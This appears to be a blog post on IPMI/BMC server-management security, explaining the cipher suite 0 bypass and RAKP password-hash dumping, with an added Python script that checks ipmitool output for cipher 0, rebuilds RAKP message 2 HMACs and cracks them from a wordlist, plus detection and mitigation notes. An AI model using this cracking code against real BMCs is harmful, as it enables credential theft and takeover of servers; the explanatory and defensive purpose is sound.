BMCs are those little mini-computers in your bare-metal servers. You know, the things with the LEDs in the big cabinets that generate heat and noise. But I love them :)
Without getting too technical here: IPMI is the name of the interface specification and RMCP is the underlying transport protocol (for LAN transmission it runs on UDP port 623; UDP is TCP's connectionless sibling). IPMI 2.0 added RMCP+, which carries the RAKP session setup that both attacks below abuse.
Since these little "BMC computers" are tightly interwoven with the rest of the server's components (they control power, the console and usually firmware updates) and have their own network interfaces, they are of course an attractive target for attacks of all kinds.
In the past, two types of attacks from the network in particular were very popular: cipher suite 0 and dumping the password hashes.
Cipher suite 0 (as in "zero") is the IPMI 2.0 cipher suite with no authentication, integrity or confidentiality. A client that negotiates it gets a session for any existing user name without the correct password, can change settings on the system and ultimately log in with that user's (typically administrator) privileges. This affected the usual manufacturers HP (iLO), Dell (iDRAC) and Supermicro, who have since fixed it with patches.
Another attack is to dump the password hashes of IPMI users: during RMCP+ session setup the BMC returns, in RAKP message 2, an HMAC keyed with the user's password before the client has proven anything at all, and that value can be cracked offline. When I try this on test servers using the usual pentest frameworks or just ipmitool, I get partial hits. Does the management software find this suspicious? Well, at least HP doesn't: when scanning, there are only IPMI/RMCP login/logoff events with severity "informational". So if SNMP traps are configured, none is generated here.
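To make the two attacks above concrete, here is an added example (my code, not from the original post or from any vendor or pentest framework). It does two things offline: flags cipher suite 0 in the output of `ipmitool lan print`, and rebuilds the RAKP message 2 Key Exchange Authentication Code (HMAC-SHA1 keyed with the user password, as laid out in section 13.28 of the IPMI 2.0 specification) so that a "dumped hash" can be cracked with a wordlist. The `ipmitool` output, session IDs, random numbers, GUID, user name and password are all constructed for the example; the line label `RMCP+ Cipher Suites` and the hashcat mode 7300 line format are assumed from those tools' documented output.

```python
# Added example, not code from the original post: offline reproduction of
# the two IPMI 2.0 attacks discussed above.
#   1. cipher0_enabled()   - flags cipher suite 0 in `ipmitool lan print` output
#   2. rakp2_* / crack_rakp - rebuilds the RAKP message 2 authentication code
#      (HMAC-SHA1 keyed with the user password, IPMI 2.0 spec section 13.28)
#      and cracks a captured one with a wordlist.
# Every sample value below is constructed for this example.
import hashlib
import hmac
import re
import struct


def cipher0_enabled(lan_print_output: str) -> bool:
    """True if cipher suite 0 is offered on the LAN channel.

    Reads the 'RMCP+ Cipher Suites' line as printed by `ipmitool lan print`
    (the line label is assumed from ipmitool's text output).
    """
    m = re.search(r"RMCP\+ Cipher Suites\s*:\s*([\d, ]+)", lan_print_output)
    if not m:
        return False
    suites = {int(s) for s in m.group(1).split(",") if s.strip()}
    return 0 in suites


# Constructed sample, modelled on the layout of `ipmitool lan print 1`.
SAMPLE_LAN_PRINT = """\
Set in Progress         : Set Complete
Auth Type Support       : MD5 PASSWORD
IP Address              : 192.0.2.10
RMCP+ Cipher Suites     : 0,1,2,3,6,7,8,11,12
Cipher Suite Priv Max   : aaaaXXaaaXXaaXX
"""


def rakp2_salt(sid_m: int, sid_c: int, rand_m: bytes, rand_c: bytes,
               guid_c: bytes, role_m: int, username: str) -> bytes:
    """Data the BMC HMACs in RAKP message 2 (IPMI 2.0 spec, section 13.28):
    SIDm(4, little endian) SIDc(4, LE) Rm(16) Rc(16) GUIDc(16) ROLEm(1) ULENm(1) UNAME.
    Everything except the password travels in the clear, so an unauthenticated
    client can reconstruct this byte string from the session handshake."""
    uname = username.encode()
    return (struct.pack("<II", sid_m, sid_c) + rand_m + rand_c + guid_c
            + bytes([role_m, len(uname)]) + uname)


def rakp2_auth_code(password: str, salt: bytes) -> bytes:
    """Key Exchange Authentication Code: HMAC-SHA1 keyed with the user password."""
    return hmac.new(password.encode(), salt, hashlib.sha1).digest()


def hashcat_7300_line(salt: bytes, auth_code: bytes) -> str:
    """Salt and hash in the 'IPMI2 RAKP HMAC-SHA1' form that hashcat mode 7300 reads."""
    return f"{salt.hex()}:{auth_code.hex()}"


def crack_rakp(salt: bytes, auth_code: bytes, wordlist):
    """Dictionary attack on a captured RAKP message 2 auth code.
    Returns the matching password, or None if no candidate matches."""
    for candidate in wordlist:
        if hmac.compare_digest(rakp2_auth_code(candidate, salt), auth_code):
            return candidate
    return None


# Constructed "capture": a BMC answering a session request for user 'admin'
# whose password is 'Admin123'. A real capture comes from the RAKP message 2
# packet; the password is only known here to build the sample.
SAMPLE_SALT = rakp2_salt(
    sid_m=0xA4A3A2A1, sid_c=0x02000000,
    rand_m=bytes(range(16)), rand_c=bytes(range(0x10, 0x20)),
    guid_c=bytes.fromhex("00112233445566778899aabbccddeeff"),
    role_m=0x14,  # privilege level 4 (ADMINISTRATOR) with bit 4 = name-only lookup
    username="admin",
)
SAMPLE_AUTH_CODE = rakp2_auth_code("Admin123", SAMPLE_SALT)

if __name__ == "__main__":
    print("cipher 0 offered:", cipher0_enabled(SAMPLE_LAN_PRINT))
    print("hashcat -m 7300 line:", hashcat_7300_line(SAMPLE_SALT, SAMPLE_AUTH_CODE))
    print("cracked:", crack_rakp(SAMPLE_SALT, SAMPLE_AUTH_CODE,
                                 ["password", "calvin", "ADMIN", "Admin123"]))
```

Two things are worth noting. The HMAC key is whatever the BMC stores as the user password (zero-padded to 16 or 20 bytes), and HMAC zero-pads short keys anyway, so cracking with the plain password as key gives the same result. And because every RAKP message 2 is answered before any proof of knowledge, the only trace on the BMC side is the ordinary session open/close pair the post describes; a detection has to look for many RMCP+ session openings from one source that never reach an authenticated session, not for a distinct "hash dumped" event. Disabling cipher suite 0 is done per channel with `ipmitool lan set <channel> cipher_privs <list>` with the first position set to `X`, after which `cipher0_enabled` on the new `lan print` output should return False.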
Dan Farmer has written some useful articles: